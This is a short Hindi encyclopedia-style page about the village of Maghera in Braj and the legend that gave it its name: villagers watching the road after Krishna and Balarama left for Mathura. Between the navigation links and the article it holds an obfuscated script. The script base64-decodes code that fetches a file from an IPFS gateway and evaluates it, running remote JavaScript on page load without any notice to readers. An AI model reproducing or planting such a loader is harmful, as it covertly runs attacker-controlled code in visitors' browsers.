मघेरा

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
नेविगेशन पर जाएँ खोज पर जाएँ

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

मघेरा / Maghera

  • जब कृष्ण और बलदेव अक्रूर के साथ रथ पर बैठकर ब्रज से मथुरा जा रहे थे, उस समय ब्रजवासी लोग उनके विरह में व्याकुल होकर मार्ग की ओर देख रहे थे, तथा रथ के चले जाने पर उसकी धूल को देखते रहे।
  • धूल के शान्त हो जाने पर भी उस मार्ग की ओर देखते रहे।
  • मग हेरा अथवा मार्ग की ओर देखने से महाराज वज्रनाभ ने इस लीला की स्मृति के लिए इस गाँव का नाम मघेरा रखा था।